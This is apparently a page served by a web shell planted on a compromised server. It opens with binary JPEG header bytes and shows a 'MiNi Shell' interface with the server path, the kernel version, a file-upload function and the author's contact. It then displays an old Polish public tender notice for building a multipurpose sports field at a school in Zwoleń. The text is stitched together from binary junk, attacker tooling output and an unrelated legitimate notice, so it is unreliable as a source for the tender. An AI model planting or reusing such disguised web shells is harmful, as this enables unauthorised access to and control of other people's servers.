JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090520/158940-N-2009.html

<p class="kh_header"><b>Zwoleń: WYKONANIE BOISKA SPORTOWEGO WIELOFUNKCYJNEGO DO GIER ZESPOŁOWYCH O NAWIERZCHNI POLIURETANOWEJ  W ZESPOLE SZKÓŁ ROLNICZO-TECHNICZNYCH  W  ZWOLENIU</b><br>
<b>Numer ogłoszenia: 158940 - 2009; data zamieszczenia: 20.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Rolniczo-Technicznych , ul. Wojska Polskiego 78, 26-700 Zwoleń, woj. mazowieckie, tel. 0-48 676 20 34, faks 0-48 676 20 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsrtzwolen.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE BOISKA SPORTOWEGO WIELOFUNKCYJNEGO DO GIER ZESPOŁOWYCH O NAWIERZCHNI POLIURETANOWEJ  W ZESPOLE SZKÓŁ ROLNICZO-TECHNICZNYCH  W  ZWOLENIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.  Postanowienia ogólne 
WYKONANIE BOISKO SPORTOWE WIELOFUNKCYJNE  DO GIER ZESPOŁOWYCH O NAWIERZCHNI POLIURETANOWEJ
1.Przedmiotem zamówienia jest wykonanie  Boisko sportowe wielofunkcyjne do gier zespołowych o nawierzchni poliuretanowej w Zespole Szkół Rolniczo-Technicznych w Zwoleniu.
2. Wszystkie użyte do realizacji zamówienia materiały muszą być pełnowartościowe oraz posiadać wymagane stosownymi przepisami aktualne świadectwa jakości, świadectwa dopuszczenia, atesty, certyfikaty na znak bezpieczeństwa, deklaracje zgodności lub certyfikaty zgodności z Polską Normą.
3. Zamawiający dopuszcza zastosowanie materiałów innych niż  przyjęte w dokumentacji projektowej, jednak o parametrach i jakości nie gorszych od posiadanych przez materiały zaproponowane przez Zamawiającego. Na zaproponowane zmiany Wykonawca winien uzyskać pozytywną opinie projektanta oraz zgodę Zamawiającego. W przypadku zastosowania innych materiałów niż wymienione w dokumentacji projektowej, Wykonawca musi liczyć się z koniecznością dostosowania projektu do proponowanych zmian materiałowych własnym staraniem i na własny koszt (przeprojektowanie), celem dostosowania projektu do nowych rozwiązań w niezbędnym zakresie wymaganym prawem budowlanym i innymi właściwymi przepisami.
4. Określony umową zakres robót Wykonawca winien zrealizować z należytą starannością, zgodnie z wymaganiami Polskich Norm, przepisami Prawa budowlanego, bhp, ppoż., oraz zasadami sztuki budowlanej.
II. Na przedmiot zamówienia składa się:
Zakres robót obejmuje wykonanie:   zdjęcie warstwy humusu z wywiezieniem poza teren szkoły lub rozplantowanie wokół projektowanego obiektu, niwelacja terenu z wykonaniem wykopu niezbędnego dla wykonania podbudowy, wykonanie podbudowy na całej powierzchni boiska z zastosowaniem zagęszczonych i ubitych warstw niezbędnych kruszyw i betonu jamistego, wykonanie drenażu francuskiego, wykonanie obrzeża wokół boiska z elementów betonowych gr 8cm i wysokości min. 30cm na ławie betonowej z betonu min. B10, wykonanie strefy bezpieczeństwa szerokości 1m wzdłuż boiska i 2m za bramkami z nawierzchni poliuretanowej w kolorze ceglastym takiej jak płyta główna  boiska, wykonanie wokół płyty boiska skarpy ziemnej pomiędzy płytą a ogrodzeniem obsianej trawą, wykonanie studni chłonnej odbierającej wodę opadową z projektowanego drenażu francuskiego, wykonanie elementów rozsączających z elementów prefabrykowanych minimum O80mm do wychwytywania wody opadowej z warstwy drenażu i odprowadzających jej nadmiar do studni chłonnej, zamontowanie tulei do montażu bramek i słupków do mocowania siatki do piłki siatkowej i tenisa ziemnego z możliwością ich zaślepiania, wykonanie nawierzchni płyty głównej boiska z poliuretanu w kolorze ceglastym ( przepuszczającej wodę opadową) wraz z niezbędnymi liniami, uporządkowanie terenu i wywiezienie powstałych w czasie budowy odpadów na wysypisko. 
  -  Płyta główna 40x20= 800m2 , strefy bezpieczeństwa - 1m wzdłuż linii bocznych i 2m wzdłuż linii bramkowych boiska= powierzchnia całkowita wraz ze strefami bezpieczeństwa 44 x 22 = 968m2. Boisko wielofunkcyjne o wymiarach jak wyżej zawierające  w swoim obrysie niżej wymienione elementy:
1. boisko do piłki ręcznej o wymiarach 20x40 m w układzie podłużnym -boisko wyraźnie ograniczone liniami szerokości 5cm w kolorze białym, wymiary boiska i poszczególnych pól mierzwię od zewnętrznej krawędzi linii rozgraniczających, pas ochronny - wzdłuż linii bocznych szerokości 1m  i wzdłuż linii bramkowych szerokości 2m, linia środkowa prostopadła do linii bocznych dzielących boisko na połowy, linie zmian zawodników prostopadłe do linii bocznych, w odległości 3,00m od linii środkowej, długości 0,5mw kierunku środka boiska, pole bramkowe- na zewnątrz słupków bramkowych licząc od tylnej krawędzi bramki zakreślić łuki o promieniu 6m wynoszące ?  obwodu koła. Oba łuki połączyć linią prostą długości 3m równoległą do linii bramkowej, bramki o wymiarach wewnętrznych 3x2x1m wykonać z profilu stalowego malowanego proszkowo i osadzić zgodnie z rysunkiem nr7. Bramki należy wyposażyć w siatki polietylenowe -PE 2,5  3,0mx2,0m o głębokości 0,8/1,0m, linie rzutów wolnych zaznaczyć linią przerywaną (kreski i odstępy po 15cm długości) równoległą do linii pola bramkowego w odległości 3m od tej linii, linie rzutów karnych o długości 1m wyznaczyć w odległości 7,0m od środka bramki równolegle do linii bramkowej.
2. boisko do piłki siatkowej o wymiarach 9x18m- w układzie podłużnym- boisko wyraźnie ograniczone liniami szerokości 5cm w kolorze niebieskim, wymiary boiska i poszczególnych pól mierzy się od zewnętrznej krawędzi linii rozgraniczających, linia środkowa dzieląca boisko na dwie połowy pokrywa się z linią środkową boiska do gry w piłkę ręczną , w odległości od 0,5 do 1,0m od linii bocznych na przedłużeniu linii środkowej należy zamontować tuleje do osadzania słupków do mocowania siatki. Słupki aluminiowe lub stalowe demontowane z możliwością zaślepienia tulei montażowych. Boisko należy wyposażyć w siatkę sznurową i krzesło sędziowskie.
3. Kort do tenisa ziemnego o wymiarach  19,97x23,77m w układzie podłużnym - kort zaprojektowano w wymiarach umożliwiające prowadzenie rozgrywek deblowych, wymiary kortu odmierza się  od zewnętrznych brzegów poszczególnych linii, linie szerokości 5cm w kolorze zielonym, boisko należy wyposażyć w rozbierane słupki mocowane na tulejach oraz w siatkę.
4. Dwa boiska treningowe do gry w kosza o wymiarach 12,5 x 20m - w układzie poprzecznym - boisko jest wyraźnie ograniczone liniami szerokości 5cm w kolorze żółtym, wymiary boiska i poszczególnych pól mierzy się od zewnętrznych krawędzi linii rozgraniczających, na środku boisk należy wykreślić koła o promieniu 1,80m mierzone od  wewnętrznych brzegów linii wyznaczających koło, linie środkowe wyznacza się równolegle do  linii  końcowych z przedłużeniem po 15cm poza linie boczne boisk , linie rzutów wolnych wyznacza się równolegle do każdej linii końcowej w odległości 5,80m od środka tych linii, linia rzutów wolnych jest średnicą koła o promieniu 1,80m zamykającego pole rzutów wolnych, tablica do kosza o wymiarach 1,80 x 1,20m należy umieścić na wysokości 2,75m mierząc od spodu tablicy do nawierzchni boiska, obręcz z siatką mocuje się centralnie w odległości 30cm od spodu tablicy i do obręczy i  3.05m od krawędzi obręczy do poziomu płyty boiska..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Oceny spełnienia warunków udziału w postępowaniu Zamawiający dokona na podstawie załączonych pod ofertę dokumentów i oświadczeń. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuję formułę spełnia nie spełnia. Nie spełnienie chociażby jednego z w w warunków skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia w oparciu o przesłanki zawarte w art. 24.
Ofertę wykonawcy wykluczonego uzna się za odrzuconą zgodnie z treścią art. 24 ust. 4 ustawy.  
W postępowaniu mogą wziąć udział wykonawcy, którzy: 
1.    Spełniają ogólne warunki wynikające z art. 22 ust.1 ustawy, tzn.:
1.1.	Posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
1.2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
1.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego zgodnie z art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych. 
2.	Warunki szczegółowe stawiane wykonawcom:
Wykażą się odpowiednim doświadczeniem, tj.: w ostatnich 5 latach (licząc do upływu terminu składania ofert), a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej dwa zamówienia dotyczące wykonania nawierzchni poliuretanowych w oferowanej technologii o powierzchni nimimum1800m2 każda.
2.1	Wykażą się dysponowaniem osobami zdolnymi do wykonania zamówienia, tj.: posiadającymi uprawnienia w zakresie robót ogólnobudowlanych, kierowania robotami budowlanymi.
2.2	Wykażą się odpowiednim potencjałem ekonomicznym, tj. posiadają na realizację zamówienia środki finansowe lub zdolność kredytową na wykonanie zamówienia, posiadają aktualne na dzień składania ofert ubezpieczenie od odpowiedzialności cywilnej.
2.3	Zaakceptują 30 dniowy termin płatności.
2.4	Udzielą na wykonane roboty co najmniej 3 letniej gwarancji.
2.5	Wykonają  nawierzchnię poliuretanową  z materiałów o parametrach technicznych nie gorszych od wskazanych w Specyfikacji Technicznej . 
3.	W przypadku gdy o udzielenie zamówienia ubiega się konsorcjum, wówczas wymaga  
 się, aby żaden z jego członków nie podlegał wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy, a członkowie łącznie spełniali warunki określone w pkt 2 ust. 2.2 -2.6 niniejszego rozdziału.
Oceny spełnienia warunków udziału w postępowaniu Zamawiający dokona na podstawie załączonych pod ofertę dokumentów i oświadczeń. Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuję formułę spełnianie spełnia. Nie spełnienie chociażby jednego z w  w warunków skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia w oparciu o przesłanki zawarte w art. 24.
Ofertę wykonawcy wykluczonego uzna się za odrzuconą zgodnie z treścią art. 24 ust. 4 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VI. Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia oceny spełnienia warunków udziału w postępowaniu 
1. W celu wykazania spełnienia warunków udziału w postępowaniu, każdy z  Wykonawców przedłoży wraz z ofertą  następujące dokumenty:
I.	Posiada uprawnienia do wykonania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy prawo zamówień publicznych.

1.	 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymieniony dokument odrębnie. 
2.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
II.	Posiada niezbędną wiedzę i doświadczeni oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
1.	Wykaz wykonanych w okresie ostatnich pięciu lat robot budowlanych (zamówień), a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie przynajmniej dwóch zamówień dotyczących wykonania nawierzchni poliuretanowych w oferowanej technologii o powierzchni nie mniejszej niż 1800m2. z podaniem daty miejsca wykonania wraz z dokumentami (referencjami) potwierdzającymi, że roboty wyszczególnione w wykazie zostały wykonane należycie - zgodnie z załącznikiem nr 4 doświadczenie zawodowe
2.	Wykaz osób odpowiedzialnych za realizację zamówienia wraz z udokumentowaniem ich uprawnień i kwalifikacji niezbędnych do prowadzenia prac, będących przedmiotem zamówienia (branża budowlana, kierowania robotami budowlanymi) oraz aktualne zaświadczenia o przynależności do właściwej Izby Inżynierów budownictwa - zgodnie z załącznikiem nr 3 potencjał kadrowy
3.	Wykaz podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonaniu zamówienia, zakres prac przewidzianych im do przekazania (nazwa i adres podwykonawcy, zakres prac przewidywanych do powierzenia) - zgodnie z załącznikiem nr 8
III.	Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.	Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy - (kwota całej wartości oferty), wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
2.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest aktualnie ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej obejmujący okres realizacji zamówienia. 
IV.	Na potwierdzenie, że oferowana powierzchnia poliuretanowa posiada wymaganą jakość i parametry techniczne:
1.	Atest higieniczny PZH
2.	Certyfikat IAAF
3.	Karta techniczna zawierająca parametry oferowanej nawierzchni (w oryginale),
4.	Autoryzacja producenta oferowanej nawierzchni sportowej wydana wykonawcy na zadanie objęte niniejszym przetargiem. Autoryzacja musi być załączona w oryginale. Autoryzacja ta musi zawierać potwierdzenie dostarczenia przez producenta oferowanej nawierzchni oryginalnych produktów w ilości odpowiadającej zamówieniu, w przypadku wygrania przez oferenta przetargu.
V.	Do oferty należy dołączyć również:
1.	Formularz oferty sporządzony przez wykonawcę według instrukcji podanej w załączniku numer 1 
2.	Szczegółowy kosztorys ofertowy, uwzględniający wszystkie pozycje wyspecyfikowane w przedmiarze robót  oraz inne dodatkowe elementy związane z realizacją zamówienia, jeżeli w ocenie Wykonawcy są niezbędne dla prawidłowej realizacji zamówienia wraz z zestawieniem podstawowych materiałów, które Wykonawca zamierza użyć do realizacji zamówienia
3.	Parafowany wzór umowy - zgodnie z załącznikiem numer 6
4.	Oświadczenie zgodne  z załącznikiem nr 5
2.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.I , 1,2,4 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości, nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, nie orzeczono wobec niego zakazu ubiegania się o zamówienie, zamiast dokumentów, o których mowa w pkt.I , 3 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
3.	Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
3.1.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości; 
3.2.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. Tłumaczenie nie jest wymagane, jeśli zamawiający wyraził zgodę, w szczególnie uzasadnionych przypadkach na złożenie wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, oświadczeń, ofert oraz innych dokumentów również w jednym z języków powszechnie używanych w handlu międzynarodowym lub języku kraju, w którym zamówienie jest udzielane.
4.	Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego w pkt. I.1. - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem pieczęcią wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu wymienionego w punkcie I.1. oraz jej podpisem. 
5.	Zamawiający wezwie wykonawców, którzy w wyznaczonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba ż mimo uzupełnienia konieczne byłoby unieważnienie postępowania.(art. 26 ust. 3 ustawy). 
6.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania także oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia. Podpisany przez wszystkich wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej. Dokument pełnomocnika należy przedstawić w formie oryginału. Zaleca się wyczerpać zobowiązanie skarbowe do ustanowionego pełnomocnictwa w formie opatrzenia go znakami skarbowymi. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik. 
7.	Jeżeli oferta wykonawców występujących wspólnie zostanie wybrana, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców. 
8.	Wykonawca może zastrzec, że określone informacje zawarte w ofercie nie mogą być udostępnione innym uczestnikom postępowania. Informacje podlegające zastrzeżeniom powinny być wyodrębnione i zamieszczone w załączniku do oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zsrtzwolen.republika.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Rolniczo-Technicznych
ul. Wojska Polskiego 78
26-700 Zwoleń.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2009 godzina 09:30, miejsce: W sekretariacie - Zespół Szkół Rolniczo-Technicznych
ul. Wojska Polskiego 78
26-700 Zwoleń.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com